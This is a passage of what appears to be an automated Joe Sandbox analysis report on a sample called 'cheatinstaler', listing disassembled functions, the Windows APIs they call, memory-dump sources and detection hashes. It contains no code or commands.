                                                                                  Function 00007FF754555294 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 1017591355-0
                                                                                  • Opcode ID: cc14dedd2e5cc10f866aa6caa5d21262f0f150b8de9e36933eecb23af5082f8f
                                                                                  • Instruction ID: af3c633485aa43da3c9486105f0aa152f3cf1c4cda9337892f8fb794b4d143bd
                                                                                  • Opcode Fuzzy Hash: cc14dedd2e5cc10f866aa6caa5d21262f0f150b8de9e36933eecb23af5082f8f
                                                                                  • Instruction Fuzzy Hash: 8F61D011A0C65B81FA64BF2B94B43FED291AF41BD0FDD4131FE4E06AC9EE6CE4418220
                                                                                  Function 00007FF754561870 Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF75455E948: ReleaseSemaphore.KERNEL32 ref: 00007FF75455E974
                                                                                    • Part of subcall function 00007FF75455E948: FindCloseChangeNotification.KERNELBASE ref: 00007FF75455E993
                                                                                    • Part of subcall function 00007FF75455E948: DeleteCriticalSection.KERNEL32 ref: 00007FF75455E9AA
                                                                                    • Part of subcall function 00007FF75455E948: CloseHandle.KERNEL32 ref: 00007FF75455E9B7
                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF754561ACB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 1624603282-0
                                                                                  • Opcode ID: ab79385019a6295203d675547ade476855bb09921ff7d489cf5816572a46c86b
                                                                                  • Instruction ID: adeccb03b314406822fe7d7a5f3e38b0599562ae9a9f653f4f18a63d08b1254b
                                                                                  • Opcode Fuzzy Hash: ab79385019a6295203d675547ade476855bb09921ff7d489cf5816572a46c86b
                                                                                  • Instruction Fuzzy Hash: DC617262B156C5A2EE08EF66D5A40BCB365FF40BD0F9C4632E72D07AD5CF28E5A18350
                                                                                  Function 00007FF75454EC9C Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: 90bbbe4b03adee6de0a9cfeccf93459ff6427d4f8da8a47d00f3fc41b718dbf5
                                                                                  • Instruction ID: 13e5fbf5269c929e73e9330ca9bc3d217f462b14916e885874a90f5371474222
                                                                                  • Opcode Fuzzy Hash: 90bbbe4b03adee6de0a9cfeccf93459ff6427d4f8da8a47d00f3fc41b718dbf5
                                                                                  • Instruction Fuzzy Hash: DB51D262E0864240EA14AF27A4E47B9A751FB85BC4FEC0136EF4D0B396CE3DE595C320
                                                                                  Function 00007FF75454E7A8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF754553EC8: FindClose.KERNELBASE(?,?,00000000,00007FF754560811), ref: 00007FF754553EFD
                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75454E993
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 1011579015-0
                                                                                  • Opcode ID: 291e6fd2762174cc1189c8c1297697099ae6cbf60ac3dcc79b926deda7363788
                                                                                  • Instruction ID: 9ad59308b5f315fab28caaddcf0019f6fd5dd4d6ff0fe4cf866b8f14219724fe
                                                                                  • Opcode Fuzzy Hash: 291e6fd2762174cc1189c8c1297697099ae6cbf60ac3dcc79b926deda7363788
                                                                                  • Instruction Fuzzy Hash: 4D517322E1868681FF60EF66D4E577DA361FF85B94F980136EA8D0B6A5CF2CD441C720
                                                                                  Function 00007FF754551794 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: 2a7259d764eb0786ebfe04c0f82892bddeea34df329c5f9a795040d30637ea4b
                                                                                  • Instruction ID: 98447c0c851af6d7c0f3ca46042f5482b21efd3bc997a30ec0887353c303c03e
                                                                                  • Opcode Fuzzy Hash: 2a7259d764eb0786ebfe04c0f82892bddeea34df329c5f9a795040d30637ea4b
                                                                                  • Instruction Fuzzy Hash: 0041D462F18A8142EA14AF17AA943B9E651FB84FC0F888535FE5D4BF5ADF3CD5918300
                                                                                  Function 00007FF754552F58 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: 83ad35d64ea7fd9ec499ef84e65e7ac41e5a751faf938eb3350802b96480f739
                                                                                  • Instruction ID: 13486cc2c372c021efac24c7f3e45ce64d1524f5e18fa5779da1cbc96f6312a8
                                                                                  • Opcode Fuzzy Hash: 83ad35d64ea7fd9ec499ef84e65e7ac41e5a751faf938eb3350802b96480f739
                                                                                  • Instruction Fuzzy Hash: 7D41D462A0870581EA14AF26F5E53B9A3A1EB44BD4F981134FB4D076A9DF3DE440C720
                                                                                  Function 00007FF75457BDF8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                  • String ID:
                                                                                  • API String ID: 3947729631-0
                                                                                  • Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                  • Instruction ID: 386f74cc9ebd033cd1b4f6ca358998e0fa1baa8279c34b13e279a4052302d4cd
                                                                                  • Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                  • Instruction Fuzzy Hash: A0417122E1865282FA24BF1798F8178A261FF54B88FDC4436DA0D5B692DF3DE941C760
                                                                                  Function 00007FF75454129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                  • String ID:
                                                                                  • API String ID: 680105476-0
                                                                                  • Opcode ID: 9aea57e1cbc1acb0343bc23020ebe7367b53934ade50ddaffc586ce89fb7cfd6
                                                                                  • Instruction ID: 4bc30e7c70f3327cd49fa9d23d90d897b2bae03c9c3b9c368a12df39a1a9b8ea
                                                                                  • Opcode Fuzzy Hash: 9aea57e1cbc1acb0343bc23020ebe7367b53934ade50ddaffc586ce89fb7cfd6
                                                                                  • Instruction Fuzzy Hash: C2218E22E0865185EA14AF93A494279A250FB04BF0FAC0B31DFBE4BBD1DE7CE5518354
                                                                                  Function 00007FF754542C54 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: 666f133610fea259bd544e2999fb6daaa2acf36aefc263c061b62d30eb464117
                                                                                  • Instruction ID: d515ce8cccf1a74cb0d0cec850459007f73e0825c4a64f2fd9097440635238eb
                                                                                  • Opcode Fuzzy Hash: 666f133610fea259bd544e2999fb6daaa2acf36aefc263c061b62d30eb464117
                                                                                  • Instruction Fuzzy Hash: AE21F822B1558662EA0CAF62D5A83F9A315FB447C4FE84431E71D0B6A2DF38A5A5C321
                                                                                  Function 00007FF754543AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: e211765aad0e482f14211f193c2fa738a397cbf9b51fc622cf430de4bdc09e7c
                                                                                  • Instruction ID: 3223e94a6378de05e612ccf3b9065f0b1231a4bba4b50b5e89da946a0e6b3983
                                                                                  • Opcode Fuzzy Hash: e211765aad0e482f14211f193c2fa738a397cbf9b51fc622cf430de4bdc09e7c
                                                                                  • Instruction Fuzzy Hash: 1B010462F1868541FA11AF2AE49122DB361FB887A4FD44231E79C0BAA5DF2CE1408704
                                                                                  Function 00007FF754571558 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF754571604: GetModuleHandleW.KERNEL32(?,?,?,00007FF754571573,?,?,?,00007FF75457192A), ref: 00007FF75457162B
                                                                                  • DloadProtectSection.DELAYIMP ref: 00007FF7545715C9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: DloadHandleModuleProtectSection
                                                                                  • String ID:
                                                                                  • API String ID: 2883838935-0
                                                                                  • Opcode ID: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
                                                                                  • Instruction ID: 19326fda6268363fb262732befb645ec6786c6490a101c87cd4a1b5fbc80f291
                                                                                  • Opcode Fuzzy Hash: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
                                                                                  • Instruction Fuzzy Hash: E7118A61D0950791FB68BF17A8F5770B391BF18389F9C0435DA0E463A1EE3CAA95CA20
                                                                                  Function 00007FF754553EC8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF7545540BC: FindFirstFileW.KERNELBASE ref: 00007FF75455410B
                                                                                    • Part of subcall function 00007FF7545540BC: FindFirstFileW.KERNEL32 ref: 00007FF75455415E
                                                                                    • Part of subcall function 00007FF7545540BC: GetLastError.KERNEL32 ref: 00007FF7545541AF
                                                                                  • FindClose.KERNELBASE(?,?,00000000,00007FF754560811), ref: 00007FF754553EFD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$FileFirst$CloseErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1464966427-0
                                                                                  • Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                  • Instruction ID: 859986facb258c858c9bcb36706334ba88e520eead939939742f53cc60e6d4e4
                                                                                  • Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                  • Instruction Fuzzy Hash: 37F0816250824185EA10AFB6B5A02BD77609F16BB4F681374FA3D072C7CE2CD444C764
                                                                                  Function 00007FF7545520D0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF75455207E), ref: 00007FF7545520F6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ChangeCloseFindNotification
                                                                                  • String ID:
                                                                                  • API String ID: 2591292051-0
                                                                                  • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                  • Instruction ID: 2f3cd10a91d710f6b97d6761f68aa068b5287938fd72725118b24911a64841ad
                                                                                  • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                  • Instruction Fuzzy Hash: 43F0A922A0464285FB24AF62D0953B9A760D714B78FDC4334F73C051D4DF28D4958B21
                                                                                  Function 00007FF75457D94C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                  • Instruction ID: c7a75cb944358a9975700df45f9d4c67f9b6e84d257c87528739c47b4649c36b
                                                                                  • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                  • Instruction Fuzzy Hash: 9AF0D451A0924645FF547FA358E52B996906F847E4F9C5A30D96E862C2DE2CE6888230
                                                                                  Function 00007FF754552490 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileType
                                                                                  • String ID:
                                                                                  • API String ID: 3081899298-0
                                                                                  • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                  • Instruction ID: 579ac676231ba9bdc1ca6e1083314fc4a1c84ae912bbd8ed8b5e7b36488abce9
                                                                                  • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                  • Instruction Fuzzy Hash: F1D0C922909841C2ED14AB3698A107C6250AF92735FE80720E63E816E1CF1E9496A721
                                                                                  Function 00007FF754557FC4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
